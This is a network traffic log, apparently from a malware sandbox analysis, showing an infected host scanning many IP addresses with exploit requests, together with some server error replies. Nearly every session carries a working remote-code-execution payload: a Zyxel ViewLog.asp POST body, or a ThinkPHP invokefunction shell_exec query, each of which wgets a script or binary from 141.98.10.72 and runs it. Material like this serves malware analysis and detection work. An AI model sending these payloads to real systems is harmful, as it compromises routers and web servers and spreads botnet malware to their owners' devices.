                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:26.307301044 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        525192.168.2.144259894.4.163.848080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:05.318480968 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        526192.168.2.143764694.131.115.2398080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:05.320509911 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:05.540410042 CET59INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        527192.168.2.143823694.123.32.1898080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:05.405319929 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        528192.168.2.1449546112.106.119.1480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:05.450640917 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        529192.168.2.1439332112.93.132.1880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:05.485827923 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:05.800710917 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:05 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        530192.168.2.144315831.136.241.208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:05.500072956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:06.118554115 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:07.366517067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:10.026474953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:15.142211914 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:25.125778913 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:45.349049091 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:26.307287931 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        531192.168.2.143297695.67.15.998080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:05.530348063 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:05.762326956 CET341INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 14 Feb 2024 08:34:05 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Content-Encoding: gzip
                                                        Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        532192.168.2.143322294.122.196.878080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:05.544356108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        533192.168.2.143734094.123.108.2088080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:05.546166897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        534192.168.2.145744094.123.127.1068080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:05.547869921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        535192.168.2.146047431.200.0.1048080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:05.548067093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        536192.168.2.1452674112.172.56.1380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:08.160461903 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        537192.168.2.1438780112.170.222.1080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:08.163624048 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:08.445473909 CET516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:34:06 GMT
                                                        Server: lighttpd/1.4.35
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        538192.168.2.1458436112.25.25.16180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:08.283035994 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:08.685524940 CET361INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:34:08 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Request-Id: 65cc7b00926874537a95d9e638d1e63c
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        539192.168.2.1458440112.25.25.16180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:08.549756050 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:09.183523893 CET361INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:34:09 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Request-Id: 65cc7b01e639bc5119b9a2caebc46241
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        540192.168.2.143855694.23.11.198080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.051358938 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:09.721076012 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        541192.168.2.144071695.217.4.1208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.059762001 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
